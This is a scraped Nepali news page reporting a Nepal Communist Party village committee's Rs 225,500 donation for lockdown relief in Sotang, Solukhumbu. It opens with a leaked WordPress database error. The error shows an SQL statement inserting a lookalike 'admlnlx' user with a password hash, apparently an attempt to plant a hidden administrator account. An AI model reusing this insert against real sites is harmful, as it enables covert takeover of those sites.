WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSwVNw5t3c/6QU.aib8P7T71n8EJdS.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 11:22:26', '', 'admlnlx', 'admlnlx')

नेकपा, सोताङ गाउँ कमिटिद्वारा विपन्न परिवारका लागि सवा दुई लाख सहयोग   – Gaule Khabar

नेकपा, सोताङ गाउँ कमिटिद्वारा विपन्न परिवारका लागि सवा दुई लाख सहयोग  

नेकपा, सोताङ गाउँ कमिटिद्वारा विपन्न परिवारका लागि सवा दुई लाख सहयोग  

 

 

सोलुखुम्बु – नेपाल कम्युनिस्ट पार्टी (नेकपा), सोताङ गाउँ कमटिद्वारा सोताङ, सोलुखुम्बुले गाउँपालिका भरिका लकडाउनबाट प्रभावित अति विपन्न परिवारलाई राहत वितरण गर्न पालिकालाई दुई लाख २५ हजार पाँच सय रुपैया प्रदान गरेको छ ।

सगाउँपालिका अध्यक्ष बीर बहादुर राईले सो रकम लिएका लिएका थिए । कोरोना भाइरसका कारण लकडाउन गर्दा दैनिक ज्याला मज्दुरी गरेर गुजारा चलाउने घरपरिवारलाई वितरण गरिने जनाइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका